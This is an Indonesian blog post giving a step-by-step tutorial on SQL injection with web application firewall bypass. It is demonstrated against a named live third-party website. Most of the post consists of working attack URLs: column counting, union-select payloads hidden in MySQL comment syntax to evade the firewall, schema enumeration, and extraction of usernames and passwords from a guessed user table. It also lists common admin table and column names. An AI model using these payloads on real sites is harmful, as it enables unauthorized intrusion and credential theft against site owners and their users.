Kamu gaptek dalam dunia IT? kamu gak punya biaya mau kuliah IT? Belajar Ngoding gratis Yuk !

Bagi kamu yang berminat untuk belajar PHP, Laravel Framework, Pemrograman Java, Android, C++, ASP.Net Silahkan bergabung bersama kami, kunjungi [Web Artisan]
Thursday, 26 December 2013

Tutorial SQL Injections + Bypass WAF

SQL Injections live Target dan Baypass WAF


Sebelumnya SEO Killer sudah pernah membahas tentang TUtorial SQL Injections step By Step dan
Blind SQL Injections

Tidak jauh berbeda dengan SQLI Blind ini,
Langsung saja, pertama siapkan target anda ..

http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'
kita mendapatkan Vuln di situs ini,
Tutorial SQL Injections + Bypass WAF
Selanjutnya mencari jumlah table dalam Databasenya, gunakan perintah
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'+order+by+1--+ (Normal)
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'+order+by+2--+ (Normal)
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'+order+by+3--+ (Normal)
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'+order+by+4--+ (Normal)
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=44'+order+by+5--+ (Error)

Tutorial SQL Injections + Bypass WAF
Berarti jumlah table ada 4 table.
Cari angka mejik dengan perintah +union+select
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+union+select+1,2,3,4--+

Tutorial SQL Injections + Bypass WAF
dan anda lihat kita mendapatkan Halaman Forbidden, Bagaimana cara agar membypass WAF dari server ini?

gunakan perintah /*!uNiOn*/+/*!sElEcT*/
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+/*!uNiOn*/+/*!sElEcT*/+1,2,3,4--+

Tutorial SQL Injections + Bypass WAF
dan silahkan Inject - inject pada table no 2.
untuk mengetahui nama Database gunakan perintah
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+/*!uNiOn*/+/*!sElEcT*/+1,@@database,3,4--+

Untuk mengetahui Versi PHP yang di gunakan, gunakan perintah
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+/*!uNiOn*/+/*!sElEcT*/+1,@@version,3,4--+

Selanjutnya mencari nama - nama table dengan menggunakan perintah
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+/*!uNiOn*/+/*!sElEcT*/+1,table_name,3,4+from+information_schema.tables--+

Tutorial SQL Injections + Bypass WAF

dan ternyata Forbidden lagi, silahkan Bypass dengan perintah
+information_schema./**/tables

http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44%27+/*!uNiOn*/+/*!sElEcT*/+1,table_name,3,4+from+information_schema./**/tables--+

Tutorial SQL Injections + Bypass WAF
 Selanjutnya Extract nama - nama table yang ada di dalam database dengan menggunakan perintah http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44%27+/*!uNiOn*/+/*!sElEcT*/+1,group_concat(table_name),3,4+from+information_schema./**/tables+where+table_schema=database()--+

Tutorial SQL Injections + Bypass WAF

Forbidden lagi, Bypass dengan menggunakan perintah berikut
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44%27+/*!uNiOn*/+/*!sElEcT*/+1,Table_name,3,4+from+information_schema./**/tables--+

Tutorial SQL Injections + Bypass WAF
Kita menemukan bahwa group_concat tidak tersedia dalam database,
lalu bagaimana cara mencari nama table dan column nya?
pertama bisa dengan cara main tebak - tebakan,

nama - nama table yang sering digunakan :

admin
tbl_admin
tb_admin
user
tbl_user
tb_user
member
tbl_member
tb_member

Nama - nama Column yang sering digunakan :

username
user
nama
password
pass
passworduser
pwd
gunakan perintah ini dengan menebak - nebak isi dari column databasenya
http://www.esensisistem.com/index1.php?esensi-sistem=32&idc=-44'+/*!uNiOn*/+/*!sElEcT*/+1,concat/*!(0x3a,idlevel,0x3a,username,0x3a,password,0x3a)*/,3,4+from+tb_user--+

Tutorial SQL Injections + Bypass WAF

Bagaimana cara mengetahui nama table dan Column secara manual ?

gunakan perintah limit 0,1 1,1 sampai anda menemukan nama table dan nama columnnya,

Penjelasan tentang Bypass WAF akan dibahas pada postingan berikutnya, silahkan update trus berita dari SEO Killer dengan mengikuti kami melalui Email,

Jika ada yang kurang jelas bisa tanya kepada saya di facebook atau melalui email,

Terima kasih

regards
chmod755

  • Blogger Comments
  • Facebook Comments
Item Reviewed: Tutorial SQL Injections + Bypass WAF Rating: 5 Reviewed By: Unknown